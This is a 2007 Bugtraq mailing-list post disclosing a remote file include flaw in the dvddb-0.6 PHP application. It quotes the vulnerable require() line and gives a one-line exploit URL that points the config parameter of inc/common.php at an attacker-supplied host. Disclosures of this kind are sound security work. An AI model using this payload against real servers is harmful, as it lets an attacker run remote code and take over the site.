
Date: 4 Feb 2007 22:43:17 -0000
From: gokhankaya@...mail.com
To: bugtraq@...urityfocus.com
Subject: dvddb-0.6 media remote file include vuln.

###########################################################################
#
#
# Title		: dvddb-0.6 media remote file include vuln.
# Author	: Blaster
# Download	: http://globalmegacorp.org/dvddb/dvddb-0.6.zip
# Contact	: msn@...ster.net
#
#
# Vuln Code: 
# require($config /"themes");
#
#
#
# ExpLoit	: http://[target]/[path]/inc/common.php?config=[attacker]
#
#
#
##########################################################################
#
# GreetZ: BLaCKWHITE, HackerBox.Eu
#
##########################################################################
